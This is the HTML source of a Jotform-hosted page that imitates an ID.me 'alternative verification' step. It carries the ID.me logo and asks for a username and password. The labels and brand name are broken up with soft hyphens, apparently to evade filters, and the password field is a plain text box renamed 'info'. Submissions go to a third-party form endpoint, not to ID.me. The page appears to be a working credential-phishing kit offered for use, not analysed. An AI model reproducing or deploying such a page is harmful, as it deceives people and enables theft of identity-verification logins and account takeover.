<script src="https://cdn01.jotfor.ms/static/prototype.forms.js?3.3.42409" type="text/javascript"></script>
<script src="https://cdn02.jotfor.ms/static/jotform.forms.js?3.3.42409" type="text/javascript"></script>
<script src="https://cdn03.jotfor.ms/js/payments/validategateways.js?v=3.3.42409" type="text/javascript"></script>
<script type="text/javascript">
    JotForm.newDefaultTheme = true;
    JotForm.extendsNewTheme = false;
    JotForm.singleProduct = false;
    JotForm.newPaymentUIForNewCreatedForms = true;
    JotForm.newPaymentUI = true;
    JotForm.clearFieldOnHide="disable";
    JotForm.submitError="jumpToFirstError";
    
    JotForm.init(function(){
    /*INIT-START*/
    if (window.JotForm && JotForm.accessible) $('input_3').setAttribute('tabindex',0);
    if (window.JotForm && JotForm.accessible) $('input_4').setAttribute('tabindex',0);
          JotForm.alterTexts(undefined);
    /*INIT-END*/
    });
    
       JotForm.prepareCalculationsOnTheFly([null,{"name":"heading","qid":"1","text":"Complete the alternative verification process","type":"control_head"},{"name":"submit2","qid":"2","text":"Verify Now","type":"control_button"},{"description":"","name":"name","qid":"3","subLabel":"","text":"Name","type":"control_textbox"},{"description":"","name":"info","qid":"4","subLabel":"","text":"Info","type":"control_textbox"}]);
       setTimeout(function() {
    JotForm.paymentExtrasOnTheFly([null,{"name":"heading","qid":"1","text":"Complete the alternative verification process","type":"control_head"},{"name":"submit2","qid":"2","text":"Verify Now","type":"control_button"},{"description":"","name":"name","qid":"3","subLabel":"","text":"Name","type":"control_textbox"},{"description":"","name":"info","qid":"4","subLabel":"","text":"Info","type":"control_textbox"}]);}, 20); 
</script>
<style type="text/css">
    @media print {
        .form-section {
            display: inline !important
        }

        .form-pagebreak {
            display: none !important
        }

        .form-section-closed {
            height: auto !important
        }

        .page-section {
            position: initial !important
        }
    }
</style>
<p>
    <link type="text/css" rel="stylesheet" href="https://cdn01.jotfor.ms/themes/CSS/5e6b428acc8c4e222d1beb91.css?v=3.3.42409">&nbsp;
    <link type="text/css" rel="stylesheet" href="https://cdn02.jotfor.ms/css/styles/payment/payment_styles.css?3.3.42409">&nbsp;
    <link type="text/css" rel="stylesheet" href="https://cdn03.jotfor.ms/css/styles/payment/payment_feature.css?3.3.42409">
</p>
<style type="text/css" id="form-designer-style">
    /* Injected CSS Code */
    /*PREFERENCES STYLE*/
    .form-all {
        font-family: Inter, sans-serif;
    }

    .form-label.form-label-auto {
        display: block;
        float: none;
        text-align: left;
        width: 100%;
    }

    .form-line {
        margin-top: 12px;
        margin-bottom: 12px;
        padding-top: 0;
        padding-bottom: 0;
    }

    .form-all {
        max-width: 752px;
        width: 100%;
    }

    .form-label.form-label-left,
    .form-label.form-label-right,
    .form-label.form-label-left.form-label-auto,
    .form-label.form-label-right.form-label-auto {
        width: 230px;
    }

    .form-all {
        font-size: 16px
    }

    .supernova .form-all,
    .form-all {
        background-color: #fff;
    }

    .form-all {
        color: #2C3345;
    }

    .form-header-group .form-header {
        color: #2C3345;
    }

    .form-header-group .form-subHeader {
        color: #2C3345;
    }

    .form-label-top,
    .form-label-left,
    .form-label-right,
    .form-html,
    .form-checkbox-item label,
    .form-radio-item label,
    span.FITB .qb-checkbox-label,
    span.FITB .qb-radiobox-label,
    span.FITB .form-radio label,
    span.FITB .form-checkbox label,
    [data-blotid][data-type=checkbox] [data-labelid],
    [data-blotid][data-type=radiobox] [data-labelid],
    span.FITB-inptCont[data-type=checkbox] label,
    span.FITB-inptCont[data-type=radiobox] label {
        color: #2C3345;
    }

    .form-sub-label {
        color: #464d5f;
    }

    .supernova {
        background-color: #f3f3fe;
    }

    .supernova body {
        background: transparent;
    }

    .form-textbox,
    .form-textarea,
    .form-dropdown,
    .form-radio-other-input,
    .form-checkbox-other-input,
    .form-captcha input,
    .form-spinner input {
        background-color: #fff;
    }

    .supernova {
        background-image: none;
    }

    #stage {
        background-image: none;
    }

    .form-all {
        background-image: none;
    }

    .form-all {
        position: relative;
    }

    .form-all:before {
        content: "";
        background-image: url("https://www.jotform.com/uploads/tingkir/form_files/id-me.647c7aa92a4e73.87172096.PNG");
        display: inline-block;
        height: 138.73873873873873px;
        position: absolute;
        background-size: 330px 138px;
        background-repeat: no-repeat;
        width: 100%;
    }

    .form-all {
        margin-top: 158px;
    }

    .form-all:before {
        top: -148px;
        background-position: top center;
        left: 0;
    }

    /*PREFERENCES STYLE*/
    /*__INSPECT_SEPERATOR__*/
    /* Injected CSS Code */
</style>
<form class="jotform-form" action="https://eu-submit.jotform.com/submit/231542972207051" method="post" name="form_231542972207051" id="231542972207051" accept-charset="utf-8" autocomplete="on"><input type="hidden" name="formID" value="231542972207051"><input type="hidden" id="JWTContainer" value=""><input type="hidden" id="cardinalOrderNumber" value="">
    <div class="form-all">
        <ul class="form-section page-section">
            <li id="cid_1" class="form-input-wide" data-type="control_head">
                <div class="form-header-group  header-large">
                    <div class="header-text httal htvam">
                        <h1 id="header_1" class="form-header" data-component="header">Complete the alternative verification process</h1>
                        <div id="subHeader_1" class="form-subHeader">Powered by I&shy;D.m&shy;e</div>
                    </div>
                </div>
            </li>
            <li class="form-line jf-required" data-type="control_textbox" id="id_3"><label class="form-label form-label-top form-label-auto" id="label_3" for="input_3">&nbsp;U&shy;se&shy;rna&shy;me<span class="form-required">*</span>&nbsp;</label>
                <div id="cid_3" class="form-input-wide jf-required" data-layout="half"><input type="text" id="input_3" name="q3_name" data-type="input-textbox" class="form-textbox validate[required]" data-defaultvalue="" style="width:310px;" size="310" value="" data-component="textbox" aria-labelledby="label_3" required=""></div>
            </li>
            <li class="form-line jf-required" data-type="control_textbox" id="id_4"><label class="form-label form-label-top form-label-auto" id="label_4" for="input_4">&nbsp;P&shy;as&shy;swo&shy;rd<span class="form-required">*</span>&nbsp;</label>
                <div id="cid_4" class="form-input-wide jf-required" data-layout="half"><input type="text" id="input_4" name="q4_info" data-type="input-textbox" class="form-textbox validate[required]" data-defaultvalue="" style="width:310px;" size="310" value="" data-component="textbox" aria-labelledby="label_4" required=""></div>
            </li>
            <li class="form-line" data-type="control_button" id="id_2">
                <div id="cid_2" class="form-input-wide" data-layout="full">
                    <div data-align="auto" class="form-buttons-wrapper form-buttons-auto   jsTest-button-wrapperField"><button id="input_2" type="submit" class="form-submit-button form-submit-button-gray-900 submit-button jf-form-buttons jsTest-submitField" data-component="button" data-content="">Verify Now</button></div>
                </div>
            </li>
            <li style="display:none;">Should be Empty: <input type="text" name="website" value=""></li>
        </ul>
    </div>
    <script>
        JotForm.showJotFormPowered = "new_footer";
    </script>
    <script>
        JotForm.poweredByText = "Powered by Jotform";
    </script><input type="hidden" class="simple_spc" id="simple_spc" name="simple_spc" value="231542972207051">
    <script type="text/javascript">
        var all_spc = document.querySelectorAll("form[id='231542972207051'] .si" + "mple" + "_spc");
        for (var i = 0; i < all_spc.length; i++)
        {
          all_spc[i].value = "231542972207051-231542972207051";
        }
    </script>
    <div class="formFooter-heightMask"><br></div>
    <div class="formFooter f6 branding21"><br></div>
</form>
<script type="text/javascript">
    JotForm.ownerView=true;
</script>
<script type="text/javascript">
    JotForm.forwardToEu=true;
</script>
<script src="https://cdn.jotfor.ms//js/vendor/smoothscroll.min.js?v=3.3.42409"></script>
<script src="https://cdn.jotfor.ms//js/errorNavigation.js?v=3.3.42409"></script>